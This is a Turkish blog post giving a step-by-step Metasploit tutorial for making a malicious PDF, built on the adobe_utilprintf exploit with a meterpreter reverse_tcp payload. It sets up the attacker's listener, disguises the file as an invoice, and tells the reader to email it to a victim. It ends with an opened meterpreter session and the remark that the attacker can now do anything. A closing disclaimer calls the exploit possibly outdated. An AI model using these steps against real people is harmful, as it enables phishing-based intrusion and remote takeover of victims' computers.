Metasploit İle Zararlı PDF Oluşturma

Erdinç 30 Eyl 2019 İpuçları  0

Günümüzde kullanılan işletim sistemleri eğer her zaman güncel tutuluyorsa ve sistemlerde güvenlik duvarı (firewall) gibi ağ cihazları bulunuyorsa bu gibi sistemlere sızmak sanıldığı kadar kolay değildir.

Bu sistemlere sızmak için sosyal mühendislik kullanılarak güvenliğin en zayıf halkası olan insan istismar edilir. Metasploit Framework kullanarak zararlı yazılım (malware-virüs) özelliği gösteren bir pdf dosya oluşturup bunu kurbana gönderdiğimizde, kurban bu pdf’yi açar açmaz bilgisayarını ele geçirebiliriz.
Bunun için öncelikle kötü amaçlı pdf’yi oluşturalım.

use exploit/windows/fileformat/adobe_utilprintf komutu ile ilgili exploiti seçiyoruz.

Ardından show options komutu ile yapmamız gereken ayarları görebiliriz.

Sonrasında set FILENAME dosyaismi.pdf komutu ile pdf oluşturuyoruz.

set PAYLOAD windows/meterpreter/reverse_tcp komutu ile de payload yüklüyoruz ki kurban makineden bizim makinemize bir oturum açılsın.

set LHOST 192.168.20.128 ve set LPORT 4455 komutları ile Kali makinemizin IP adresini ve port numarasını yazıyoruz.

Son olarak exploit komutu ile exploiti çalıştırarak pdf oluşturma işlemini tamamlıyoruz.

Sonrasında cp /root/.msf4/local/KasimFaturaniz.pdf /root komutu ile de oluşturulan pdf dosyasını root dizinine kopyalıyoruz.

Şimdi sıra geldi kötü amaçlı pdf’yi kurbana göndermeden önce açılacak ters bağlantıyı (revers TCP) yakalamak için bir dinleyici kurmaya. Gerekli komutlar şekilde görünmektedir.

Bu zararlı pdf’yi e-mail aracılığıyla kurbanın e-mail adresine gönderiyoruz ve pdf’yi açmasını bekliyoruz.

Karşı taraf pdf’yi açtığı zaman aşağıdaki şekilde bir mesaj alırsak meterpreter oturumu açmışız demektir. Artık  istediğimiz her şeyi yapabiliriz. 🙂

Sending stage (718336 bytes)
session[*] Meterpreter session 1 opened (192.168.20.128:4455 -> 192.168.20.131:49322)
meterpreter >

NOT: Burada anlatılan exploit, güncel işletim sistemi ve pdf okuyucularda çalışmayabilir veya karşıya gönderdiğimizde Windows Defender tarafından silinebilir. Burada amaç Metaspolit Framework ile nasıl zararlı içeren pdf oluşturulduğunu göstermektir.

 

Kaynak : siberguvenlik.web.tr

2019 yılının 10 siber güvenlik trendi
İndirim Günlerinde Güvenli Alışveriş Önemli İpuçları
2019’un En Dikkat Çekici 5 Zararlı Yazılımı
Siber Güvenliğe Yeni Başlayanlar İçin LİNUX Destekli WİFİ Kart

Bir Cevap Yazın